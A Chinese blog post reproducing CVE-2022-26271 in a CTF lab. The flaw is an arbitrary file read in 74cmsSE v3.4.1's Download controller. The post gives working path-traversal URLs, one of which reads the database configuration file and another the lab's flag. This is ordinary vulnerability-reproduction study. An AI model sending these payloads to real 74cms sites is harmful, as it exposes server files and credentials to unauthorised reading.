【漏洞复现】74cmsSEv3.4.1任意文件读取漏洞(CVE-2022-26271)

【漏洞复现】74cmsSEv3.4.1任意文件读取漏洞(CVE-2022-26271)


0x01 漏洞描述

春秋云镜靶场:74cmsSEv3.4.1存在任意文件读取漏洞。

CVE描述:74cmsSE v3.4.1 was discovered to contain an arbitrary file read vulnerability via the $url parameter at \index\controller\Download.php.

74cmsSEv3.4.1下载链接:https://www.74cms.com/downloadse/show/id/62.html

0x02 影响版本

74cmsSE v3.4.1

0x03 漏洞分析

\upload\application\index\controller\Download.php的第10行,有一个文件操作函数,其中$url是用户可以控制的参数,不被过滤,$ourput_filename是要输出的文件名。

构造参数:

/index/download/index?name=index.php&url=../../application/database.php

参考漏洞报告:https://github.com/N1ce759/74cmsSE-Arbitrary-File-Reading/issues/1

0x04 漏洞复现

进入靶场,界面如下:

构造payload:

/index/download/index?name=index.php&url=../../../../../../flag

页面直接下载index.php文件,打开后flag如下:


posted @ 2023-03-17 22:54  0dot7  阅读(413)  评论(0编辑  收藏  举报